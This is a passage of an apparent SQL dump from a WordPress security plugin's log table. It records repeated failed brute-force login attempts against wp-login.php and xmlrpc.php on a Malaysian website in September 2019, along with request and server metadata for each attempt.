07:18:59',18255872,19555160,'https://bintara.com.my/xmlrpc.php',1,0,'88.135.36.50'),(24005,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"53526\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX84yuBXE2JRepjOtvmuJAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568618698.5397\";s:12:\"REQUEST_TIME\";s:10:\"1568618698\";}}','notice','2019-09-16 07:24:59','2019-09-16 07:24:58',17740632,19229648,'https://bintara.com.my/wp-login.php',1,0,'216.10.243.118'),(24006,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"53884\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX84zOBXE2JRepjOtvmuJQAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568618700.8345\";s:12:\"REQUEST_TIME\";s:10:\"1568618700\";}}','notice','2019-09-16 07:25:02','2019-09-16 07:25:01',18253848,19553640,'https://bintara.com.my/xmlrpc.php',1,0,'216.10.243.118'),(24007,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"47142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX87nwavjo3v4tJT4rverwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568619423.9978\";s:12:\"REQUEST_TIME\";s:10:\"1568619423\";}}','notice','2019-09-16 07:37:05','2019-09-16 07:37:04',17739064,19231000,'https://bintara.com.my/wp-login.php',1,0,'51.77.64.186'),(24008,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"47598\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX87or1rBLb0GV3O7mTXmQAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568619426.8982\";s:12:\"REQUEST_TIME\";s:10:\"1568619426\";}}','notice','2019-09-16 07:37:08','2019-09-16 07:37:07',18256640,19555832,'https://bintara.com.my/xmlrpc.php',1,0,'51.77.64.186'),(24009,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"56400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX88ZQavjo3v4tJT4rvfAwAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568619621.9252\";s:12:\"REQUEST_TIME\";s:10:\"1568619621\";}}','notice','2019-09-16 07:40:23','2019-09-16 07:40:22',17739456,19231192,'https://bintara.com.my/wp-login.php',1,0,'132.148.146.230'),(24010,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"57384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX88aAavjo3v4tJT4rvfBAAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568619624.6792\";s:12:\"REQUEST_TIME\";s:10:\"1568619624\";}}','notice','2019-09-16 07:40:26','2019-09-16 07:40:25',18255640,19555600,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.146.230'),(24011,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"82.196.3.212\";s:11:\"REMOTE_PORT\";s:5:\"56613\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8-QQavjo3v4tJT4rvg9wAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568620353.1962\";s:12:\"REQUEST_TIME\";s:10:\"1568620353\";}}','notice','2019-09-16 07:52:35','2019-09-16 07:52:33',17739600,19231400,'https://bintara.com.my/wp-login.php',1,0,'82.196.3.212'),(24012,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"82.196.3.212\";s:11:\"REMOTE_PORT\";s:5:\"57999\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8-SQavjo3v4tJT4rvg@QAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568620361.8211\";s:12:\"REQUEST_TIME\";s:10:\"1568620361\";}}','notice','2019-09-16 07:52:43','2019-09-16 07:52:42',18255712,19555720,'https://bintara.com.my/xmlrpc.php',1,0,'82.196.3.212'),(24013,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"43574\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9BKL1rBLb0GV3O7mTYaAAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568620840.7069\";s:12:\"REQUEST_TIME\";s:10:\"1568620840\";}}','notice','2019-09-16 08:00:41','2019-09-16 